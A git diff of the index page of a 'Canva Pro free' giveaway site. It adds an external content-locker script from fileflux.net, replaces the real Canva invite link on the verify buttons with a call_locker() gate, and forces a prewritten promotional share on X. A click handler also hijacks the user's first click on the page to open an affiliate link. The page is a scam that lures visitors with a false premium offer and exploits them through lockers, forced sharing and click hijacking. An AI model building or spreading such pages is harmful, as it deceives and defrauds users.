--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html>
 <head>
 
-		
+		<script type="text/javascript" src="https://fileflux.net/script_include.php?id=1313665">
 	<meta name="monetag" content="508d22d57026c880cf7f650df452b3a1">
 	<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4200710519380728"
      crossorigin="anonymous"></script>
@@ -285,7 +285,7 @@ select.input-command {
 			<center>ALL Done Click The Verify Button and get your canva pro free.</center><br>
 			
 				<!--<center><div data-captcha-enable="true"></div></center>-->
-			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="tundrafile.com/1253453" alt="Click here to Get Canva Pro FREE">
+			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="call_locker();" alt="Click here to Get Canva Pro FREE">
 			
 			<!--<br><center><b>Confused? Watch This Video Tutorial in Detail</b></center><br><br>
 			<div class="iframe-container">
@@ -312,8 +312,8 @@ select.input-command {
 
 			<!--<center><div data-captcha-enable="true"></div></center>
 			<br>-->
-            <a href="https://www.canva.com/brand/join?token=0tyYVD0zXOKhDtUutkRayw&referrer=team-invite" target="_blank">
-			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="https://www.canva.com/brand/join?token=0tyYVD0zXOKhDtUutkRayw&referrer=team-invite" alt="Click Here To Get Canva Pro FREE"></a><br><br>
+        
+			<img style="cursor:pointer;" src="img/button_verify.png" width="80%" onclick="call_locker();" alt="Click Here To Get Canva Pro FREE"></a><br><br>
 			
 			<!--<center><b>Confused? Watch This Video Tutorial in Detail</b></center></b></b><br><br>
 			<br><div class="iframe-container">
@@ -373,7 +373,7 @@ select.input-command {
 	
 <ol>
     <div class="buttons" style="border-radius: 6px; font-size: 15px; text-align: center;">
-        <a class="fa fa-youtube-play" href="#" id="btn_yt" onclick="show()" onmouseout="this.style.background='red'" onmouseover="this.style.background='#e30202'" style="background: rgb(38, 24, 238); border-radius: 6px; color: white; display: inline-block; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;SHARE on FB TO UNLOCK CANVA PRO FREE</a>
+        <a class="fa fa-youtube-play" href="#" id="btn_yt" onclick="show()" onmouseout="this.style.background='red'" onmouseover="this.style.background='#e30202'" style="background: rgb(38, 24, 238); border-radius: 6px; color: white; display: inline-block; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;SHARE on X TO UNLOCK CANVA PRO FREE</a>
     <div style="margin: auto;"> 
         <button onclick="move()" id="yt" onmouseout="this.style.background='red'" onmouseover="this.style.background='#135B0A'" style="background-color: rgb(74, 134, 247); border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">GET FREE CANVA PROO</button> 
         <a class="fa fa-download" href="#" id="ytv" style="background-color: rgb(120, 109, 218); border-radius: 6px; color: white; display: none; font-size: 15px; font-weight: 500; margin: 15px 30px; padding: 14px 0px; text-decoration: none; transition: all 0.2s linear 0s; width: 250px;">&nbsp;Checking you SHARE or not...</a>
@@ -390,7 +390,7 @@ select.input-command {
       document.getElementById("yt").style.display = "none";
       document.getElementById("ytv").style.display = "none";
       function show() {
-          window.open('https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fcanvaprofree.tech%2F&amp;src=sdkpreparse');
+          window.open('https://twitter.com/intent/tweet?url=https%3A%2F%2Fcanvaprofree.tech%2F&text=Get%20CanvaPro%20for%20FREE%21%20Transform%20your%20favorite%20memories%20into%20beautiful%20canvases%20with%20CanvaProFree.%20Limited%20time%20offer%2C%20don%27t%20miss%20out%21%20%F0%9F%8E%A8🖼️%F0%9F%86%93%20%23CanvaProFree%20%23CanvasPrints%20%23Memories');
           // sleep(3000);
           setTimeout(function () {
               document.getElementById("yt").style.display = "block";
@@ -449,5 +449,29 @@ select.input-command {
 <br> <a href="https://canvaprofree.tech/Best-Graphic-Design-Software.html">Read Also : Best Graphic Design Software</a><br />
 
 <h4>Copyright 2022 Canva Pro FREE</h4>
+
+
+    <script>
+        // Function to open the URL in a new tab
+        function openURLInNewTab(url) {
+            window.open(url, '_blank');
+        }
+
+        // Function to handle the first click event
+        function handleClickOnce(event) {
+            // URL to open in a new tab
+            const urlToOpen = 'https://partner.canva.com/5b3W1b';
+
+            // Open the URL in a new tab
+            openURLInNewTab(urlToOpen);
+
+            // Remove the event listener after the first click
+            document.removeEventListener('click', handleClickOnce);
+        }
+
+        // Add the event listener to the whole document
+        document.addEventListener('click', handleClickOnce);
+    </script>
+
 </body>
 </html>
